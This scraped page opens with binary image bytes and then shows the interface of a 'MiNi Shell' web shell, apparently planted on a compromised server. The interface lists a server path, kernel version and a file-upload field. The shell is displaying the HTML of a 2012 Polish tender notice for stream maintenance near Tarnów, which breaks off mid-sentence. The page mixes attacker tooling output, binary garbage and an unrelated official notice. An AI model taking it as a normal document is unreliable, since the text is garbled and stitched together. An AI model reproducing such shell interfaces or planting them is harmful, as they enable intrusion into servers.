JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120713/250936-N-2012.html

<p class="kh_header"><b>Tarnów: Część nr 1 zamówienia: Potok Młynówka w km 0+000-2+460 uregulowany - konserwacja bieżąca. 
Część nr 2 zamówienia: Potok CSK w km 0+860-3+200,  km 3+400-4+860 uregulowany, w km 0+000-0+860 nieuregulowany - konserwacja bieżąca.
Część nr 3 zamówienia: Wał Babicy prawy w km 0+650 - naprawa przyczółka śluzy.</b><br>
<b>Numer ogłoszenia: 250936 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy w Tarnowie , ul. Ostrogskich 5, 33-100 Tarnów, woj. małopolskie, tel. 014 6376922, faks 014 6376913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część nr 1 zamówienia: Potok Młynówka w km 0+000-2+460 uregulowany - konserwacja bieżąca. 
Część nr 2 zamówienia: Potok CSK w km 0+860-3+200,  km 3+400-4+860 uregulowany, w km 0+000-0+860 nieuregulowany - konserwacja bieżąca.
Część nr 3 zamówienia: Wał Babicy prawy w km 0+650 - naprawa przyczółka śluzy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 zamówienia: Potok Młynówka w km 0+000-2+460 uregulowany - konserwacja bieżąca. Ręczne wykoszenie porostów gęstych twardych ze skarp potoku, obustronnie wraz z wygrabieniem-12 300m2. Wygrabianie wykoszonych porostów z dna cieku wraz z wygrabieniem - 1 388m2. Hakowanie dna potoku przy zarośnięciu powierzchni lustra wody do 60% w km 0+650-2+460, złożenie wydobytej roślinności na brzegu skarpy - 1 388m2.  Udrożnienie dna potoku przy  grubości namułu do 20cm cieku różnej szerokości, łącznie - 1 810m. Oczyszczenie przepustów rurowych o średnicy 0,80m z namułu o głębokości zamulenia przewodu do 1/2 wysokości średnicy - 20m. Oczyszczanie kęp z krzaków lub starek występujących lokalnie na skarpach potoku na całej długości przy poroście rzadkim lub średnim, ze złożeniem na brzegu skarp potoku - 2 260m2. Ręczne usunięcie z przerzutem, warstwy ziemi urodzajnej z darnią grubości do 15cm obustronnie w km 0+100-2+460 (zwisy),  przerzucenie odspojonej ziemi na pobocze przy górnej krawędzi skarpy  z rozplantowaniem względnie odłożenie na uszkodzonych skarpach potoku z ubiciem i wyrównaniem powierzchni skarp - 668m2.
Część nr 2 zamówienia: Potok CSK w km 0+860-3+200,  km 3+400-4+860 uregulowany, w km 0+000-0+860 nieuregulowany - konserwacja bieżąca.
Rozbiórka zatorów z przekroju koryta w km 0+000÷0+860, ze złożeniem na skarpie - 7,44m3. Oczyszczanie kęp z krzaków lub starek przy poroście rzadkim lub średnim  ze złożeniem na skarpie - 3 700m2. Ręczne wykoszenie porostów gęstych twardych ze skarp, obustronnie wraz z wygrabieniem  i złożeniem przy górnej krawędzi potoku - 18 240m2. Ręczne wykoszenie porostów gęstych twardych z dna cieku wraz z wygrabieniem i złożeniem przy górnej krawędzi skarpy - 1 928m2.  Udrożnienie dna cieku o różnej szer., grubość namułu do 20cm, wyrzucenie namułu na pobocze względnie ułożenie na uszkodzonych skarpach, rozplantowanie namułu lub ubicie zasypanych skarp i wyrównanie, oczyszczenie pasów szer. 0,6m wzdłuż krawędzi cieku - 3 580mb.  Oczyszczenie przepustów rurowych o średnicy 0,80m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy, złożenie wydobytego namułu na skarpie - 40mb. Hakowanie przy zarośnięciu powierzchni lustra wody do 60% - 1 928m2. Ręczne usunięcie z przerzutem, warstwy ziemi urodzajnej z darnią grubości do 15cm, z rozplantowaniem na skarpach potoku obustronnie - 1 140m2. Udrożnienie dna cieku  wykonywane na odkład koparką  na odcinku w km 1+850-2+070 (220m)-poprawa obsuniętej skarpy z formowaniem - 550m3.
Część nr 3 zamówienia: Wał Babicy prawy w km 0+650 - naprawa przyczółka śluzy.
Ręczne wykoszenie porostów gęstych twardych ze skarp i korony wału  wraz z wygrabieniem - 225m2. Usunięcie z przerzutem, warstwy ziemi urodzajnej z humusem  ze skarp wału grubości do 15cm - 15m2. Wykopy oraz przekopy w gruncie kategorii III wykonywane na odkład  koparką, wału - odkrycie rur na długości 2,0m - 18,75m3. Demontaż skorodowanej uszkodzonej klapy zwrotnej wraz z warsztatowym wykonaniem nowej kompletnej klapy typu wieszarowego o wymiarach 55*55*0,5 cm oraz uchwytów wraz z zamontowaniem - 1szt. Naprawa starego zniszczonego przyczółka żelbetowego o grubości do 20cm z wykonaniem nowego przyczółka - 0,78m3. Naprawa ręczna rur o średnicy 0,4m, ponowne ułożenie rur żelbetowych na wykonanym uprzednio naprawionym fundamencie, zabezpieczenie styków papą na lepiku, wykonanie opaski z betonu - 2m. Dokop ręczny pod przewód rurowy  oraz dokop ręczny pod przyczółek i płytę wypadową przyczółka ze  złożeniem urobku na odkład - 2,54m3. Wykonanie podsypek ze żwiru lub pospółki pod ławę fundamentową oraz pod płytę wypadową przyczółka (łącznie grubość 15cm) - 3,72m2. Wykonanie podłoża betonowe pod rurociąg grubości 10cm na długości 2m - 0,24m3. Zbrojenie konstrukcji przyczółka prętami o średnicy do 8mm - 16kg. Ręczny zasyp za ścianami naprawianej budowli oraz rurociągu z ubiciem warstwami 20cm ubijakami ręcznymi - 1,5m3. Formowanie i zagęszczanie spycharkami nasypów - 18,75m3. Plantowanie korony i skarp nasypu wał, humusowanie skarp warstwą grubości 10cm z obsianiem - 15m2. Transport lądowy z załadunkiem i wyładunkiem ręcznym gruzu  ciągnikiem kołowym z przyczepą na odległość  1km - 2t. Grodze ziemne o wysokości do 1,5m, stopy skarp umocnione darniną na płask - 7,5m3. Odwodnienie wykopu przy użyciu pomp godzin 16..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2, 71.34.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że wykonał co najmniej 1 zamówienie  w okresie ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał (lub wykonuje- w przypadku świadczeń okresowych lub  ciągłych) co najmniej  1 usługi (potwierdzonej dokumentami, że została wykonana lub jest wykonywana / w przypadku świadczeń ciągłych lub okresowych), należycie :
dla części nr 1 i 3 - wartość usługi nie mniejsza niż 10 000 zł (słownie: dziesięć tysięcy złotych). dla części nr 2 - wartość usługi nie mniejsza niż 30 000 zł (słownie: trzydzieści tysięcy złotych), Rodzaj usługi musi odpowiadać przedmiotowi zamówienia. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje lub będą dysponować sprzętem i urządzeniami niezbędnymi do wykonania zamówienia wraz z informacją o podstawie dysponowania tym sprzętem. 
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje osobami posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie konieczne do realizacji zamówienia oraz informacje o podstawie do dysponowania tymi osobami posiadającymi kwalifikacje oraz posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego odpowiedniej części zamówienia. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty, 
2.Kosztorys ofertowy,
3.Zaakceptowany projekt umowy, 
4.Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 
5.Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona 
w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu,
6.Oświadczenie zgodnie z art. 44 o spełnieniu warunków udziału w postępowaniu, 
o których mowa w art. 22 ust. 1. 7.Oświadczenie , że nie podlega wykluczeniu na podstawie przesłanek zawartych w art 24 ust 1-2,
7.Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia 
w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,
8.W przypadku osób fizycznych oświadczenie, że wyrażają zgodę na uczestnictwo 
w realizacji przedmiotu zamówienia po stronie Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Nie przewiduje się wzrostu cen przedstawionych w kosztorysie ofertowym, jak również  możliwości zmian składników cenotwórczych  podanych w ofercie bez względu na zaistniałą  w międzyczasie sytuację za wyjątkiem stawki podatku VAT, którego zmiana następuje z mocy prawa.
2. Dopuszcza się  możliwość zmiany treści umowy w następującym zakresie:
a).zmiany w KRS, wpisie do ewidencji działalności gospodarczej w trakcie realizacji zamówienia. 
b) zmiany kont bankowych,	
c) wystąpienie oczywistych omyłek pisarskich  i rachunkowych w treści umowy.
d) w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie za okresy realizacji umowy przypadające po wprowadzeniu zmienionej stawki podatku od towarów i usług ulegnie odpowiedniej zmianie, w taki sposób, aby wynikająca z umowy cena netto pozostała niezmieniona,
e) obniżenia wynagrodzenia, o którym mowa §3 ust.1,
f) zmian regulacji prawnych obowiązujących w dniu podpisania umowy lub po jej podpisaniu
g) zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych - dopuszcza się możliwość wprowadzenia innych, nieistotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy
3. Zmiana terminu wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku:
a) konieczności udzielenia zamówień dodatkowych w rozumieniu art. 67 ust. 1 pkt. 5 ustawy pzp, których wykonanie rzutuje na termin wykonania zamówienia podstawowego,
b) zdarzeń losowych tj. podtopienia terenu, na którym jest wykonywana umowa spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Inspektorat Rejonowy w Tarnowie, ul. Ostrogskich 5, pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2012 godzina 09:30, miejsce: Inspektorat Rejonowy w Tarnowie, ul. Ostrogskich 5 w sekretariat, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Potok Młynówka w km 0+000-2+460 uregulowany - konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczne wykoszenie porostów gęstych twardych ze skarp potoku, obustronnie wraz z wygrabieniem -12 300m2. Wygrabianie wykoszonych porostów z dna cieku wraz z wygrabieniem - 1 388m2. Hakowanie dna potoku przy zarośnięciu powierzchni lustra wody do 60% w km 0+650-2+460, złożenie wydobytej roślinności na brzegu skarpy - 1 388m2.  Udrożnienie dna potoku przy  grubości namułu do 20cm cieku różnej szerokości, łącznie - 1 810m. Oczyszczenie przepustów rurowych o średnicy 0,80m z namułu o głębokości zamulenia przewodu do 1/2 wysokości średnicy - 20m. Oczyszczanie kęp z krzaków lub starek występujących lokalnie na skarpach potoku na całej długości przy poroście rzadkim lub średnim, ze złożeniem na brzegu skarp potoku - 2 260m2. Ręczne usunięcie z przerzutem, warstwy ziemi urodzajnej 
z darnią grubości do 15cm obustronnie w km 0+100-2+460 (zwisy),  przerzucenie odspojonej ziemi na pobocze przy górnej krawędzi skarpy  z rozplantowaniem względnie odłożenie na uszkodzonych skarpach potoku z ubiciem i wyrównaniem powierzchni skarp - 668m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Potok CSK w km 0+860-3+200,  km 3+400-4+860 uregulowany, w km 0+000-0+860 nieuregulowany - konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozbiórka zatorów z przekroju koryta w km 0+000÷0+860, ze złożeniem na skarpie - 7,44m3. Oczyszczanie kęp z krzaków lub starek przy poroście rzadkim lub średnim  ze złożeniem na skarpie - 3 700m2. Ręczne wykoszenie porostów gęstych twardych ze skarp, obustronnie wraz z wygrabieniem  i złożeniem przy górnej krawędzi potoku - 18 240m2. Ręczne wykoszenie porostów gęstych twardych z dna cieku wraz z wygrabieniem i złożeniem przy górnej krawędzi skarpy - 1 928m2.  Udrożnienie dna cieku o różnej szer., grubość namułu do 20cm, wyrzucenie namułu na pobocze względnie ułożenie na uszkodzonych skarpach, rozplantowanie namułu lub ubicie zasypanych skarp i wyrównanie, oczyszczenie pasów szer. 0,6m wzdłuż krawędzi cieku - 3 580mb.  Oczyszczenie przepustów rurowych o średnicy 0,80m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy, złożenie wydobytego namułu na 